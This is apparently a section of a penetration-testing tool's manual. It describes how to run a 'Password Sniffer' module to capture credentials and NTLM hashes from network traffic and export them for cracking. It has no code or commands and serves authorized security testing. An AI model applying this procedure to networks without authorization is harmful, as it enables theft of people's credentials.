Sniffing Password Hashes from the Network
Usernames, passwords and password hashes can sometimes be obtained by sniffing network traffic. To sniff the network looking for passwords, use the "Password Sniffer" module from the root of the Information Gathering folder in the Modules Panel. This module requires the agent to have packet capture capabilities. Agents that have this capability are the localagent and agents with the Pcap plugin running with root/administrator privileges.
To start looking for passwords by capturing packets, do the following:
- Start by selecting an appropriate agent for this activity. As mentioned before, the agent must be able to capture packets from the network. The host on which the agent is running must also be positioned in the network at a point where it makes sense to sniff network packets, as only packets going through the same network segment will be seen by that host. Also keep in mind that in switched environments, all network packets are not received by every host on the same network segment.
- Launch the Password Sniffer module from the Information Gathering folder. The module will run and continually capture appropriate packets, extracting password or hash information when possible. This information will be stored in the Entity Database.
Captured usernames and passwords will be stored in the Entity Database. Captured NTLM hashes can be exported to a password cracker. This procedure is described in the following section.